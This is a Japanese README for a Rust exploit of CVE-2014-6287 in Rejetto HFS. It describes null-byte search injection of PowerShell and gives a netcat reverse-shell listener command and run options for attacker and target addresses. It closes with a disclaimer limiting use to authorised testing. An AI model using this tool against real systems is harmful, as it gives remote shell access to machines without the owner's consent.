
Rejetto HTTP File Server (HFS) バージョン 2.3c より前の 2.3x を標的とする CVE-2014-6287 エクスプロイトの Rust 実装。
CVE-2014-6287 エクスプロイトの Rust 実装。Rejetto HTTP File Server (HFS) バージョン 2.3x(2.3c より前)を標的とします。
CVE-2014-6287 は、Rejetto HTTP File Server (HFS) における重大なリモートコード実行の脆弱性です。
Rejetto HTTP File Server の parserLib.pas 内の findMacroMarker 関数は、検索アクション内の %00 シーケンスを介して、リモートの攻撃者が任意のプログラムを実行することを可能にします。この脆弱性により、攻撃者は入力検証を回避し、ターゲットシステム上で実行される悪意のあるコードを注入できます。
このエクスプロイトは次のように動作します:
%00) を含む悪意のある検索クエリを作成する{. と .} 内に PowerShell コマンドを注入するエクスプロイトを実行する前に、攻撃マシン上でリバースシェルを受け取るためのリスナーをセットアップします:
# <LPORT> を使用したいリッスンポートに置き換えてください
nc -lvnp <LPORT>
cargo run -- -l <LHOST> -p <LPORT> -r <RHOST> [-t <RPORT>]
-l, --lhost <LHOST>: ローカル IP アドレス(攻撃マシン)-p, --lport <LPORT>: リバースシェル用のローカルポート-r, --rhost <RHOST>: ターゲット IP アドレス(脆弱な HFS サーバー)-t, --rport <RPORT>: ターゲットポート(デフォルト: 80)このツールは教育目的および許可された侵入テスト目的のみに使用してください。責任を持って、所有しているシステムまたは明示的な許可を得たシステムに対してのみ使用してください。